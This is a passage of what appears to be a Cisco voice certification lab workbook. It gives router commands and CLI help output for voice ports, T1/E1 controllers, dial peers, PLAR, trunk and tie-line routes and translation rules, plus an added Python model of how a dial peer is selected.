music-threshold
Threshold for Music on Hold
mwi
Enable MWI on this port
no
Negate a command or set its defaults
non-linear
Use non-linear processing during echo cancellation
output
Configure output attenuation for voice
playout-delay
Configure voice playout delay buffer
ren
Ringer Equivalence Number
ring
Ring frequency Parameters
shutdown
Take voice-port offline
signal
The signaling type for the interface FXS or FXO
snmp
Modify SNMP voice port parameters
station-id
Configure station ID
supervisory
Configure supervisory disconnect lcfo
threshold
Threshold [noise] for voice port
timeouts
Configure voice timeout parameters
timing
Configure voice timing parameters
translate
Translation rule
translation-profile Translation profile
trunk-group
Configure interface to be in a trunk group
voice-class
Set voiceport voice class control parameters
(config-voiceport)# signal loopstart
(config-voiceport)# ?
Voice-port configuration commands:
battery-reversal
Enable FXO battery-reversal detection
bearer-cap
Specify the bear capability
busyout
Configure busyout trigger event & procedure
comfort-noise
Use fill-silence option
connection
Specify Trunking Parameters
cptone
Configure voice call progress tone locale
default
Set a command to its defaults
description
Description of what this port is connected to
dial-type
Configure type of dialer for voice
disc_pi_off
close voice path when disconnect with PI received
echo-cancel
Echo-cancellation option
exit
Exit from voice-port configuration mode
impedance
Specifies the terminating impedance of the interface
input
Configure input gain for voice
music-threshold
Threshold for Music on Hold
no
Negate a command or set its defaults
non-linear
Use non-linear processing during echo cancellation
output
Configure output attenuation for voice
playout-delay
Configure voice playout delay buffer
pre-dial-delay
FXO Pre-dial Delay
ring
Number of rings
shutdown
Take voice-port offline
signal
The signaling type for the interface FXS or FXO
snmp
Modify SNMP voice port parameters
station-id
Configure station ID
supervisory
Configure answer + disconnect supervision options

threshold
Threshold [noise] for voice port
timeouts
Configure voice timeout parameters
timing
Configure voice timing parameters
translate
Translation rule
translation-profile Translation profile
trunk-group
Configure interface to be in a trunk group
voice-class
Set voiceport voice class control parameters
(config-voiceport)# ring ?
number Number of rings for the FXO interface
(config-voiceport)# ring number ?
<1-10> The number of rings detected before closing loop
(config-voiceport)# ring number 3
(config-voiceport)# dial ?
dtmf
touch-tone dialer
mf
mf-tone dialer
pulse pulse dialer
(config-voiceport)# dial-type dtmf

This answers on the third ring and uses a DTMF (touch-tone) dialer.

Cisco Router Challenge 213


Outline
This challenge involves the configuration of FXS (Foreign Exchange Station) Voice Port
Configuration for the main configuration timers, especially in situations where users require
more time to dial numbers. The main timeouts are initial timeout, interdigit timeout,
ringing timeout and the hookflash-in timer.
Objectives
The objectives of this challenge are to:

Define FXS Voice Port details.
Define FXS country details.
Define voice port timer settings, especially for initial timeout, interdigit timeout,
ringing timeout and the hookflash-in timer.

Outline
> enable
# sh version
# config t
(config)# voice-port 1/0/0
(config-voiceport)# signal groundstart
(config-voiceport)# cptone GB
(config-voiceport)# ring cadence pattern01
(config-voiceport)# timeout call-disconnect 10
(config-voiceport)# timeout initial 15
(config-voiceport)# timeout interdigit 20
(config-voiceport)# timeout ringing 60

(config-voiceport)# timeout hookflash-in 500

Example
> enable
# sh version
# config t
(config)# voice-port 1/0/0
(config-voiceport)# signal groundstart
(config-voiceport)# cptone GB
(config-voiceport)# ring cadence pattern01
(config-voiceport)# timeout ?
call-disconnect Call Disconnect Timeout after Destination Hangs Up in
seconds
hookflash-in
Define hookflash-in delay in milliseconds
initial
Initial Timeout duration in seconds
interdigit
Interdigit Timeout duration in seconds
power-denial
Duration for which power-denial is applied
ringing
Ringing no answer timeout duration in seconds
wait-release
Wait release timeout duration in seconds
(config-voiceport)# timeout call-disconnect ?
<0-120> seconds
infinity infinite timeout
(config-voiceport)# timeout initial ?
<0-120> seconds
(config-voiceport)# timeout interdigit ?
<0-120> seconds
(config-voiceport)# timeout power-denial ?
<0-1500> milliseconds
(config-voiceport)# timeout ringing ?
<5-60000> seconds
infinity
infinite timeout
(config-voiceport)# timeout wait-release ?
<1-3600> seconds
infinity infinite timeout
(config-voiceport)# timeout call-disconnect 10
(config-voiceport)# timeout initial 15
(config-voiceport)# timeout interdigit 20
(config-voiceport)# timeout ringing 60
(config-voiceport)# timeout hookflash-in 500

This sets the ringing timeout to 60 seconds, which gives the user up to one minute to answer
the call. It also increases the interdigit timeout to 20 seconds, which again gives users a
maximum time between dialing digits of 20 seconds.
The hookflash is a brief interruption in the loop current when a trunk route starts, and is not
taken as a call disconnect. It is caused by momentarily pressing down the cradle on a
telephone. Also, some telephones reserve a button (such as 'recall') that sends a timed loop
break.

Cisco Router Challenge 214


Outline
There are two main base TDM (Time Division Multiplexing) streams: E1 (mainly used in
Europe) and T1 (mainly used in the USA). These streams give 2.048Mbps (for E1 with 32
channels) and 1.544Mbps (for T1 with 24 channels). This challenge involves defining the
parameters for a T1 connection.
Objectives
The objectives of this challenge are to:

Define T1 configuration details.
Define the framing type.
Define the clock source.
Define the line code used.
Define how many channels are used (DS0 group), and the signaling type (E&M
Wink Start signaling).

Outline
> enable
# sh version
# config t
(config)# controller t1
(config-controller)# framing esf
(config-controller)# clock source line
(config-controller)# linecode b8zs
(config-controller)# ds0-group 1 timeslots 1-2 type e&m-wink-start
(config-controller)# pri-group timeslots 1-24
(config-controller)# no shutdown
(config-controller)# exit
(config)# isdn switch-type primary-qsig

Example
> enable
# sh version
# config t
(config)# controller t1
(config-controller)# ?
Controller configuration commands:
cablelength
Specify cable length for a DS1 link
cas-group
Configure the specified timeslots for CAS(Channel Associate Signals)
channel-group Specify timeslots to channel-group mapping for an interface
clock
Specify the clock source for a DS1 link
default
Set a command to its defaults
description
Controller specific description
ds0
ds0 commands
exit
Exit from controller configuration mode
fdl
Specify the FDL standard for a DS1 data link
framing
Specify the type of Framing on a DS1 link
help
Description of the interactive help system


linecode
Specify line encoding method for a DS1 link
loopback
Put the entire T1 line into loopback
no
Negate a command or set its defaults
pri-group
Configure specified timeslots for PRI
shutdown
Shut down a DS1 link (send Blue Alarm)
(config-controller)# framing esf
(config-controller)# clock source line
(config-controller)# linecode b8zs
(config-controller)# ds0-group 1 timeslots 1-2 type e&m-wink-start
(config-controller)# no shutdown
(config-controller)# exit
(config)# isdn switch-type primary-qsig
(config)# exit
# sh controller t1
T1 is up.
Applique type is Channelized T1
Cablelength is long gain36 0db
No alarms detected.
alarm-trigger is not set
Slot 4 CSU Serial #09480883 Model TEB HWVersion 6.00 RX level = 0DB
Configured clock mode swapped to Loop-timed by priority clocking!!
Framing is ESF, Line Code is B8ZS, Clock Source is Line.

Cisco Router Challenge 215


Outline
There are two main base TDM (Time Division Multiplexing) streams: E1 (mainly used in
Europe) and T1 (mainly used in the USA). These streams give 2.048Mbps (for E1 with 32
channels) and 1.544Mbps (for T1 with 24 channels). This challenge involves defining the
parameters for an E1 connection.
Objectives
The objectives of this challenge are to:

Define E1 configuration details.
Define the framing type.
Define the clock source.
Define the line code used.

Outline
> enable
# sh version
# config t
(config)# controller e1
(config-controller)# framing crc4
(config-controller)# clock source line
(config-controller)# linecode hdb3
(config-controller)# no shutdown
(config-controller)# exit
(config)# isdn switch-type primary-qsig

Example
> enable
# sh version
# config t
(config)# controller e1
(config-controller)# framing crc4
(config-controller)# clock source line
(config-controller)# linecode hdb3
(config-controller)# no shutdown
(config-controller)# exit
(config)# isdn switch-type primary-qsig

(config)# exit
# show controllers e1
E1 is up.
Applique type is Channelized E1 - balanced
No alarms detected.
Version info of Slot 0: HW: 2, Firmware: 4, PLD Rev: 2
Manufacture Cookie is not programmed.
Framing is CRC4, Line Code is HDB3, Clock Source is Line Primary.
Data in current interval (251 seconds elapsed):
0 Line Code Violations, 0 Path Code Violations
0 Slip Secs, 0 Fr Loss Secs, 0 Line Err Secs, 0 Degraded Mins
0 Errored Secs, 0 Bursty Err Secs, 0 Severely Err Secs, 0 Unavail Secs
Total Data (last 24 hours)
0 Line Code Violations, 0 Path Code Violations,
0 Slip Secs, 0 Fr Loss Secs, 0 Line Err Secs, 0 Degraded Mins,
0 Errored Secs, 0 Bursty Err Secs, 0 Severely Err Secs, 0 Unavail Secs

Cisco Router Challenge 216


Outline
This challenge involves the configuration of FXO (Foreign Exchange Office) Voice Port
Configuration on a Voice-enabled router, and fine tuning the voice port details, such as for
the input gain and the output attenuation.
Objectives
The objectives of this challenge are to:

Define FXO Voice Port details.
Define the input gain for the voice.
Define the input impedance.
Define the output attenuation.
Disable echo cancellation.

Outline
> enable
# config t
(config)# voice-port 1/0/0
(config-voiceport)# signal loopstart
(config-voiceport)# ring number 3
(config-voiceport)# dial-type dtmf
(config-voiceport)# input gain 1
(config-voiceport)# impedance 600r
(config-voiceport)# output attenuation 0

Example
> enable
# config t
(config)# voice-port 1/0/0
(config-voiceport)# signal loopstart
(config-voiceport)# ring number 3
(config-voiceport)# dial-type dtmf
(config-voiceport)# impedance ?
600r 600 Ohms real
(config-voiceport)# impedance 600r
(config-voiceport)# input ?
gain Configure gain in db for voice input
(config-voiceport)# input gain ?
<-6 - 14> gain in db
(config-voiceport)# input gain 1
(config-voiceport)# output ?
attenuation Amount of attenuation inserted at transmit side
of the interface
(config-voiceport)# output attenuation ?
<-6 - 14> attenuation in db
(config-voiceport)# output attenuation 0
(config-voiceport)# no ?
Voice-port configuration commands:
battery-reversal
Enable FXO battery-reversal detection
bearer-cap
Specify the bear capability
busyout
Configure busyout trigger event & procedure
comfort-noise
Use fill-silence option
connection
Specify Trunking Parameters
cptone
Configure voice call progress tone locale
default
Set a command to its defaults
description
Description of what this port is connected to
dial-type
Configure type of dialer for voice
disc_pi_off
close voice path when disconnect with PI received
echo-cancel
Echo-cancellation option
exit
Exit from voice-port configuration mode
impedance
Specifies the terminating impedance of the interface
input
Configure input gain for voice
music-threshold
Threshold for Music on Hold
no
Negate a command or set its defaults
non-linear
Use non-linear processing during echo cancellation

output                Configure output attenuation for voice
playout-delay         Configure voice playout delay buffer
pre-dial-delay        FXO Pre-dial Delay
ring                  Number of rings
shutdown              Take voice-port offline
signal                The signaling type for the interface FXS or FXO
snmp                  Modify SNMP voice port parameters
station-id            Configure station ID
supervisory           Configure answer + disconnect supervision options
threshold             Threshold [noise] for voice port
timeouts              Configure voice timeout parameters
timing                Configure voice timing parameters
translate             Translation rule
translation-profile   Translation profile
trunk-group           Configure interface to be in a trunk group
voice-class           Set voiceport voice class control parameters

(config-voiceport)# no echo-cancel ?
coverage
Echo Cancel Coverage
enable
Echo Cancel Enable
suppressor Echo Suppressor
(config-voiceport)# no echo-cancel enable

Cisco CCVP Test 3


Voice Interface Configuration
The most up-to-date version of this test is at:
http://networksims.com/v03.html

Cisco Router Challenge 217


Outline
This challenge involves the configuration of a dial peer. When a call is initiated, the router
must decide where the call is to be routed. A dial peer is an addressable end point, which uses
a destination pattern with explicit digits and wildcards to define a single telephone number
or a range of numbers. The main dial peers in VoIP are:

POTS dial peers. These connect to a traditional phone network (POTS), such as a PBX
or the PSTN. The dial peer has a telephone number and a specific voice port on the edge
device.
VoIP dial peers. These connect to an IP network, and the dial peer has a destination
address and a next-hop router. Normally the destination is defined as the loopback
address of the remote device.

Objectives
The objectives of this challenge are to:

Define a POTS dial peer.
Define a VoIP dial peer.

Outline
> enable
# config t
(config)# dial-peer voice 1 pots
(config-dial-peer)# destination-pattern 11
(config-dial-peer)# port 1/0/0
(config-dial-peer)# exit
(config)# dial-peer voice 2 voip
(config-dial-peer)# destination-pattern 22
(config-dial-peer)# session target ipv4:88.10.11.12

In the first example the phone is on a POTS network, thus when the phone dials Extension
11 the call is sent to Port 1/0/0 (where it should find the remote connection). In the second
example the phone connects to an IP network, thus if it dials Extension 22 the call is directed
to the IP address 88.10.11.12.
Example
> enable
# config t
(config)# dial-peer ?
cor
Class of Restriction
hunt
Define the dial peer hunting choice
outbound
Define the outbound options
terminator Define the address terminate character
voice
Voice type
(config)# dial-peer voice ?
<1-2147483647> Voice dial-peer tag
(config)# dial-peer voice 1 ?
mmoip Multi Media Over IP
pots
Telephony
voatm Voice over ATM
vofr
Voice over Frame Relay
voip
Voice over IP
(config)# dial-p voice 1 pots
(config-dial-peer)# ?
DIALPEER configuration commands:
answer-address
The Call Destination Number
authentication
SIP Digest Authentication Configuration
call-block
Incoming Call Blocking
capacity
capacity update timer config
carrier-id
Configure Carrier ID
clid
Caller ID option
corlist
set the Class of Restriction lists
default
Set a command to its defaults
description
Dialpeer specific description
destination
Outbound dial-peer match config
destination-pattern
A full E.164 telephone number prefix

digit-strip           Use digit strip option for the POTS digits replacement
direct-inward-dial    Use Called Number as final call destination
dnis-map              The name of a configured dnis-map
exit                  Exit from dial-peer configuration mode
fax                   Configure fax
forward-digits        Configure the destination digits forward of this dialpeer
group-name
Configure parameter group
huntstop
Stop hunting on Dial-Peers
incoming
Incoming called number
information-type
Information type for dialpeer
max-conn
Sets the maximum connections per peer, negation sets
to unlimited
no
Negate a command or set its defaults
numbering-type
The calling/called party numbering type
paramspace
Define parameter space
permission
set the call orig/term permission of this dialpeer
port
Voice port associated with this peer
preference
Configure the preference order of this dialpeer
prefix
The pattern to be dialed before the dialed num
register
Register the E.164 number of this dial peer with
gatekeeper
resource
Resource allocation policy
service
The selected service
session
The session [ target | protocol | transport ] for this
peer
shutdown
Change the Admin State of this peer to down (no->up)
supplementary-service Config supplementary service features
supported-language
Language(s) supported by the peer
tgrep
TGREP config
tone
Generate tones
translate-outgoing
Translation rule
translation-profile
Translation profile
trunk-group-label
Configure Trunk Group Label
trunkgroup
trunk groups associated with this peer
voice
Configure GATEWAY dial-peer for voice services
voice-class
Set Dial-peer voice class control parameters
(config-dial-peer)# destination-pattern ?
WORD A sequence of digits - representing the prefix or full telephone number
(config-dial-peer)# destination-pattern 11
(config-dial-peer)# port ?
<1-1> Voice interface slot #
(config-dial-peer)# port 1/0/0
(config-dial-peer)# exit
(config)# dial-p voice 2 voip
(config-dial-peer)# destination-pattern 22
(config-dial-peer)# session ?
protocol
The session protocol to be used in getting to this peer
target
The session target for this peer
transport The transport layer protocol used for this peer
(config-dial-peer)# session target ?
WORD A string specifying the session target
(config-dial-peer)# session target ipv4:88.10.11.12

Cisco Router Challenge 218


Outline

This challenge involves the configuration of a dial peer with a default destination pattern, and
defining a preference for the dial-peer.
Objectives
The objectives of this challenge are to:

Define a POTS dial peer.
Define a VoIP dial peer.
Define a default VoIP dial peer.
Define a preference for the dial-peer.

Outline
> enable
# config t
(config)# dial-peer voice 1 pots
(config-dial-peer)# destination-pattern 11
(config-dial-peer)# port 1/0/0
(config-dial-peer)# exit
(config)# dial-peer voice 3 voip
(config-dial-peer)# destination-pattern .T
(config-dial-peer)# session target ipv4:88.10.11.12
(config-dial-peer)# preference 1
(config)# dial-peer voice 2 voip
(config-dial-peer)# destination-pattern 22
(config-dial-peer)# session target ipv4:88.10.11.13
(config-dial-peer)# preference 2

The .T pattern matches one or more digits of any value (the T tells the router to keep
collecting digits until the interdigit timeout expires), and is typically used as a default
destination pattern: it is selected only if none of the other patterns match. With the
preference command the device will pick the dial-peer with the highest preference, which is
the one with the lowest preference value (0 is the most preferred).
Example
> enable
# config t
(config)# dial-peer voice 1 pots
(config-dial-peer)# destination-pattern 11
(config-dial-peer)# port 1/0/0
(config-dial-peer)# exit
(config)# dial-peer voice 3 voip
(config-dial-peer)# destination-pattern .T
(config-dial-peer)# session target ipv4:88.10.11.12
(config-dial-peer)# prefe ?
<0-10> Preference order
(config-dial-peer)# preference 1
(config)# dial-peer voice 2 voip
(config-dial-peer)# destination-pattern 22
(config-dial-peer)# session target ipv4:88.10.11.13
(config-dial-peer)# preference 2
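To make the matching rules above concrete, here is an added example written in Python; it is not part of the NetworkSims challenge and not Cisco IOS code. It models a dial-peer table with the three peers configured in this challenge and selects the outbound dial-peer the way the text describes: among the peers whose destination-pattern matches the called digits, the one with the most explicit digits wins, and among equally explicit matches the lowest preference value wins. The pattern syntax modelled is the subset used in these challenges (digits, a dot for exactly one digit and a trailing T for any further digits), so it also covers the 11.. and 22.. patterns of the later tie-line challenge. The assumption that a pattern has to account for the whole called number is a simplification of the router's digit-by-digit collection, and the peer tables are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class DialPeer:
    """One 'dial-peer voice <tag> {pots|voip}' entry (constructed model)."""
    tag: int
    kind: str               # "pots" or "voip"
    pattern: str            # destination-pattern
    preference: int = 0     # preference <0-10>; 0 is the most preferred


def pattern_to_regex(pattern: str) -> str:
    """Translate a destination-pattern into an anchored regular expression.

    '.' matches exactly one digit and a trailing 'T' matches any further
    digits (the variable-length case).  Assumption: the pattern has to
    account for the whole called number, a simplification of the router's
    digit-by-digit collection.
    """
    parts = []
    for ch in pattern:
        if ch == ".":
            parts.append(r"\d")
        elif ch == "T":
            parts.append(r"\d*")
        elif ch.isdigit() or ch in "*#":
            parts.append(re.escape(ch))
        else:
            raise ValueError(f"unsupported pattern character {ch!r}")
    return "^" + "".join(parts) + "$"


def explicit_digits(pattern: str) -> int:
    """Count the literal digits in a pattern; wildcards do not count."""
    return sum(1 for ch in pattern if ch.isdigit() or ch in "*#")


def matching_peers(peers: List[DialPeer], called: str) -> List[DialPeer]:
    """All dial-peers whose destination-pattern matches the called digits."""
    return [p for p in peers if re.match(pattern_to_regex(p.pattern), called)]


def best_dial_peer(peers: List[DialPeer], called: str) -> Optional[DialPeer]:
    """Select the outbound dial-peer: most explicit digits matched first,
    then the lowest preference value.  Returns None when nothing matches,
    which is the case the router treats as an unroutable call."""
    candidates = matching_peers(peers, called)
    if not candidates:
        return None
    # max() keeps the first of equally ranked peers; the router would hunt.
    return max(candidates, key=lambda p: (explicit_digits(p.pattern), -p.preference))


# Constructed dial-peer table: the three peers configured in this challenge.
PEERS = [
    DialPeer(tag=1, kind="pots", pattern="11"),
    DialPeer(tag=3, kind="voip", pattern=".T", preference=1),   # default route
    DialPeer(tag=2, kind="voip", pattern="22", preference=2),
]

# Constructed table in the style of the tie-line challenge (four-digit extensions).
TIE_LINE_PEERS = [
    DialPeer(tag=1, kind="pots", pattern="11.."),
    DialPeer(tag=2, kind="voip", pattern="22.."),
]


if __name__ == "__main__":
    for called in ("11", "22", "33"):
        peer = best_dial_peer(PEERS, called)
        print(f"{called} -> dial-peer {peer.tag} ({peer.kind}, pattern {peer.pattern})")
    for called in ("2211", "221"):
        peer = best_dial_peer(TIE_LINE_PEERS, called)
        print(f"{called} -> {'no dial-peer' if peer is None else 'dial-peer %d' % peer.tag}")
```

Running the table from this challenge gives 11 to dial-peer 1, 22 to dial-peer 2 (two explicit digits beat the wildcard pattern even though dial-peer 3 has the better preference value) and any other number to the .T default, dial-peer 3; a number that no pattern matches returns None, which is where a catch-all .T peer should be given a deliberate, restricted target rather than being left to route anything.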


Cisco Router Challenge 219


Outline
This challenge involves the configuration of a PLAR (Private Line Automatic Ringdown)
connection. With PLAR, if a telephone goes off-hook, the router selects a predefined dial
peer to set up a call to a PBX or a destination telephone. The user does not hear a dial tone,
and the connection is made automatically. Typical examples of this are in a hotel reception,
where a visitor might pick up the phone and be directed to the telephone in Reception.
Objectives
The objectives of this challenge are to:

Define a POTS dial peer.
Define a VoIP dial peer.
Define a PLAR connection which will connect a telephone on a certain voice port to a
destination phone, automatically.

Outline
> enable
# config t
(config)# voice-port 1/0/0
(config-voiceport)# connection plar 22
(config-voiceport)# exit
(config)# dial-peer voice 1 pots
(config-dial-peer)# destination-pattern 11
(config-dial-peer)# port 1/0/0
(config-dial-peer)# exit
(config)# dial-peer voice 2 voip
(config-dial-peer)# destination-pattern 22
(config-dial-peer)# session target ipv4:88.10.11.12

In this example, when the telephone connected to voice port 1/0/0 is picked up, this router
(Remote Router) will automatically generate the digits 22 for a dial-peer lookup. It will
then match these digits to dial-peer 2, and send the call automatically to a destination of
88.10.11.12 (the loopback address of the Central Router), where the device there will send it
to the correct voice port:

Telephone --Voice1/0/0--| Remote   |------| Central     |--- Telephone
(Ext. 11)               | Router   |      | Router      |    (Ext. 22)
                        | 10.0.0.1 |      | 88.10.11.12 |

Thus the user will connect automatically to a certain telephone.


Example


> enable
# config t
(config)# voice-port 1/0/0
(config-voiceport)# connection ?
plar
Private Line Auto Ringdown
tie-line A tie line
trunk
A Straight Tie Line
(config-voiceport)# connection plar ?
WORD A string of digits including wild cards
tied dedicated tie to this number
(config-voiceport)# connection plar 22
(config-voiceport)# exit
(config)# dial-peer voice 1 pots
(config-dial-peer)# destination-pattern 11
(config-dial-peer)# port 1/0/0
(config-dial-peer)# exit
(config)# dial-peer voice 2 voip
(config-dial-peer)# destination-pattern 22
(config-dial-peer)# session target ipv4:88.10.11.12

Cisco Router Challenge 220


Outline
This challenge involves the configuration of a trunk route. A trunk route remains
permanent, even in the absence of any calls. The ports on either side will thus be
permanently allocated to the trunk route. A trunk line is a little like a hot-line which is
permanently connected, no matter what. There is no dialing involved at all.
Objectives
The objectives of this challenge are to:
Define a POTs dial peer.
Define a VoIP dial peer.
Define a trunk connection.

Outline
> enable
# config t
(config)# voice-port 1/0/0
(config-voiceport)# connection trunk 22
(config-voiceport)# exit
(config)# dial-peer voice 1 pots
(config-dial-peer)# destination-pattern 11
(config-dial-peer)# port 1/0/0
(config-dial-peer)# exit
(config)# dial-peer voice 2 voip
(config-dial-peer)# destination-pattern 22
(config-dial-peer)# session target ipv4:88.10.11.12

In this example there will be a direct connection from the phone connected to the
destination, which makes a connection back through dial-peer 1:

Telephone --Voice1/0/0--| Remote   |------| Central     |--- Telephone
(Ext. 11)               | Router   |      | Router      |    (Ext. 22)
                        | 10.0.0.1 |      | 88.10.11.12 |

In this example, both dial-peers are required, one for the outbound connection (dial-peer 2),
and the other to map the connection back to the same port (dial-peer 1).
In this case the dial-peer on the other side (Central Router) will be:
> enable
# config t
(config)# voice-port 1/0/0
(config-voiceport)# connection trunk 11
(config-voiceport)# exit
(config)# dial-peer voice 1 pots
(config-dial-peer)# destination-pattern 22
(config-dial-peer)# port 1/0/0
(config-dial-peer)# exit
(config)# dial-peer voice 2 voip
(config-dial-peer)# destination-pattern 11
(config-dial-peer)# session target ipv4:10.0.0.1

Example
> enable
# config t
(config)# voice-port 1/0/0
(config-voiceport)# connection ?
plar
Private Line Auto Ringdown
tie-line A tie line
trunk
A Straight Tie Line
(config-voiceport)# connection trunk ?
WORD A string of digits including wild cards
(config-voiceport)# conn tr 22 ?
answer-mode Slave mode trunking
retry-timer timer value for retry connetion
<cr>
(config-voiceport)# connection trunk 22
(config-voiceport)# exit
(config)# dial-peer voice 1 pots
(config-dial-peer)# destination-pattern 11
(config-dial-peer)# port 1/0/0
(config-dial-peer)# exit
(config)# dial-peer voice 2 voip
(config-dial-peer)# destination-pattern 22
(config-dial-peer)# session target ipv4:88.10.11.12

Cisco Router Challenge 221



Outline
This challenge involves the configuration of a tie-line route. Tie-lines are often used to
assign a dedicated circuit between two PBXs. Here there is an IP network in between
the PBX connections, thus two remote sites with PBXs can be connected via a tie-line over an
IP network.
Objectives
The objectives of this challenge are to:
Define a POTs dial peer.
Define a VoIP dial peer.
Define a tie-line connection.

Outline
> enable
# config t
(config)# voice-port 1/0/0
(config-voiceport)# connection tie-line 22
(config-voiceport)# exit
(config)# dial-peer voice 1 pots
(config-dial-peer)# destination-pattern 11..
(config-dial-peer)# port 1/0/0
(config-dial-peer)# exit
(config)# dial-peer voice 2 voip
(config-dial-peer)# destination-pattern 22..
(config-dial-peer)# session target ipv4:88.10.11.12

With a tie-line there is a direct connection between the two telephone systems. Any phone
on the 11.. extensions will be able to connect directly to a phone on the 22.. telephone
system.

Telephone --Voice1/0/0--| Remote   |------| Central     |--- Telephone
(Ext. 11..)             | Router   |      | Router      |    (Ext. 22..)
                        | 10.0.0.1 |      | 88.10.11.12 |

For example, if a user phones Ext 2211 from the 11.. network, the call will be routed to the
22.. network, and the same goes for the 22.. network, where a call to the 11.. network will be
routed to the 11.. telephone network. In this case the dial-peer on the other side (Central
Router) will be:
> enable
# config t
(config)# voice-port 1/0/0
(config-voiceport)# connection tie-line 11
(config-voiceport)# exit
(config)# dial-peer voice 1 pots
(config-dial-peer)# destination-pattern 22..
(config-dial-peer)# port 1/0/0
(config-dial-peer)# exit
(config)# dial-peer voice 2 voip
(config-dial-peer)# destination-pattern 11..
(config-dial-peer)# session target ipv4:10.0.0.1

Example
> enable
# config t
(config)# voice-port 1/0/0
(config-voiceport)# connection tie-line 22
(config-voiceport)# exit
(config)# dial-peer voice 1 pots
(config-dial-peer)# destination-pattern 11..
(config-dial-peer)# port 1/0/0
(config-dial-peer)# exit
(config)# dial-peer voice 2 voip
(config-dial-peer)# destination-pattern 22..
(config-dial-peer)# session target ipv4:88.10.11.12

Cisco Router Challenge 222


Outline
This challenge involves the configuration of a translation rule, which uses a regular-expression
format to match and rewrite the dialed digits.
Objectives
The objectives of this challenge are to:

Define a translation-rule.
Apply translation-rule.

Outline
> enable
# config t
(config)# voice translation-rule 111
(cfg-translation-rule)# rule 1 /^666/ /444\1/
(cfg-translation-rule)# exit
(config)# dial-peer voice 10 pots
(config-dial-peer)# destination-pattern 99..
(config-dial-peer)# translate-outgoing called 111
(config-dial-peer)# forward-digits all
(config-dial-peer)# exit
(config)# voice translation-profile 111

Example

> enable
# config t
(config)# voice ?
call
Voice call related configuration.
cause-code
Sets the internal Q850 cause code mapping
class
Control parameters class
disc-pi-incoming-on disconn with PI from incoming leg is maintained
dnis-map
Create or add to a dnis-map
dsp
DSP functions
enum-match-table
enum match table entry
hpi
Host port interface
hunt
Dialpeer hunt conditions.
iec
Configure Internal Error Code behavior
register
voice register commands
rtp
enable to open RTP in both directions.
service
Global packet telephony service commands
source-group
Source Group configuration commands
statistics
Voice Statistics
translation-profile Translation profile configuration commands
translation-rule
Translation Rule configuration commands
vad-time
Voice activity detection hangover period
(config)# voice translation-rule ?
<1-2147483647> Translation rule tag
(config)# voice translation-rule 111
(cfg-translation-rule)# ?
Translation rule configuration commands:
default Set a command to its defaults
exit
Exit from Translation rule configuration mode
help
Description of the interactive help system
no
Negate a command or set its defaults
rule
Translation rule
(cfg-translation-rule)# rule ?
<1-15> Translation rule tag
(cfg-translation-rule)# rule 1 ?
/WORD/ Matching pattern
reject Call block rule
(cfg-translation-rule)# rule 1 /^666/ ?
/WORD/ Replacement pattern
(cfg-translation-rule)# rule 1 /^666/ /444\1/ ?
plan Match and replace the number plan
type Match and replace the number type
<cr>
(cfg-translation-rule)# rule 1 /^666/ /444\1/
(cfg-translation-rule)# exit
(config)# dial-peer voice 10 pots
(config-dial-peer)# ?
DIALPEER configuration commands:
answer-address
The Call Destination Number
authentication
SIP Digest Authentication Configuration
call-block
Incoming Call Blocking
capacity
capacity update timer config
carrier-id
Configure Carrier ID
clid
Caller ID option
corlist
set the Class of Restriction lists
default
Set a command to its defaults
description
Dialpeer specific description
destination
Outbound dial-peer match config
destination-pattern
A full E.164 telephone number prefix

digit-strip           Use digit strip option for the POTS digits replacement
direct-inward-dial    Use Called Number as final call destination
dnis-map              The name of a configured dnis-map
exit                  Exit from dial-peer configuration mode
fax                   Configure fax
forward-digits        Configure the destination digits forward of this dialpeer
group-name
Configure parameter group
huntstop
Stop hunting on Dial-Peers
incoming
Incoming called number
information-type
Information type for dialpeer
max-conn
Sets the maximum connections per peer, negation sets
to unlimited
no
Negate a command or set its defaults
numbering-type
The calling/called party numbering type
paramspace
Define parameter space
permission
set the call orig/term permission of this dialpeer
port
Voice port associated with this peer
preference
Configure the preference order of this dialpeer
prefix
The pattern to be dialed before the dialed num
register
Register the E.164 number of this dial peer with
gatekeeper
resource
Resource allocation policy
service
The selected service
session
The session [ target | protocol | transport ] for this
peer
shutdown
Change the Admin State of this peer to down (no->up)
supplementary-service Config supplementary service features
supported-language
Language(s) supported by the peer
tgrep
TGREP config
tone
Generate tones
translate-outgoing
Translation rule
translation-profile
Translation profile
trunk-group-label
Configure Trunk Group Label
trunkgroup
trunk groups associated with this peer
voice
Configure GATEWAY dial-peer for voice services
voice-class
Set Dial-peer voice class control parameters
(config-dial-peer)# destination-pattern 99..
(config-dial-peer)# translate-outgoing ?
called
called party number will required translate
calling calling party number will required translate
(config-dial-peer)# translation-profile ?
incoming Translation Profile for incoming call leg
outgoing Translation Profile for outgoing call leg
(config-dial-peer)# translate-outgoing called 111
(config-dial-peer)# forward-digits ?
<0-32> number of right-justified dialed digits to be forwarded
all
forward all destination digits
extra
extra dialed digits to be forwarded
(config-dial-peer)# forward-digits all
(config-dial-peer)# exit
(config)# voice translation-profile ?
WORD Translation profile name
(config)# voice translation-profile 111
(cfg-translation-profile)# ?
Translation Profile configuration commands:
default
Set a command to its defaults
exit
Exit from translation profile configuration mode
help
Description of the interactive help system
no
Negate a command or set its defaults

translate             Specify numbers that should be translated

Cisco CCVP Test 4


Voice Dial Peer Configuration
The most up-to-date version of this test is at:
http://networksims.com/v04.html

Cisco Router Challenge 162


Outline
This challenge involves compressing the RTP header on a serial interface.
> CCNP ONT Area: Unit 5: Congestion Avoidance, Policing, Shaping and Link Efficiency
Mechanisms
Objectives
The objectives of this challenge are to:

Define RTP header compression.

Example
> en
# config t
(config)# int s0
(config-if)# ip ?
Interface IP configuration subcommands:
access-group
Specify access control for packets
accounting
Enable IP accounting on this interface
address
Set the IP address of an interface
audit
Apply IDS audit name
auth-proxy
Apply authenticaton proxy
authentication
authentication subcommands
bandwidth-percent
Set EIGRP bandwidth limit
broadcast-address
Set the broadcast address of an interface
cef
Cisco Express Fowarding interface commands
cgmp
Enable/disable CGMP
dhcp
Configure DHCP parameters for this interface
directed-broadcast Enable forwarding of directed broadcasts
dvmrp
DVMRP interface commands
flow
NetFlow related commands
header-compression IPHC options


hello-interval
Configures IP-EIGRP hello interval
helper-address
Specify a destination address for UDP broadcasts
hold-time
Configures IP-EIGRP hold time
idle-group
Specify interesting packets for idle-timer
igmp
IGMP interface commands
information-reply
Enable sending ICMP Information Reply messages
inspect
Apply inspect name
irdp
ICMP Router Discovery Protocol
load-sharing
Style of load sharing
local-proxy-arp
Enable local-proxy ARP
mask-reply
